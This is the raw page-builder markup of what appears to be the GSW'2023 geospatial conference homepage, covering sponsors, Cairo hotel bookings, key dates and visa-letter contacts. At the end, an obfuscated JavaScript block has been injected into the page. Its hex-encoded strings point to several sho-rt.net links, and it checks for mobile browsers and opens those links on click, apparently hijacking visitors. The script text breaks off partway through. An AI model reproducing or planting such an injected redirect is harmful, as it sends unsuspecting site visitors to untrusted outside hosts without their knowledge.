target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687710061920{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( 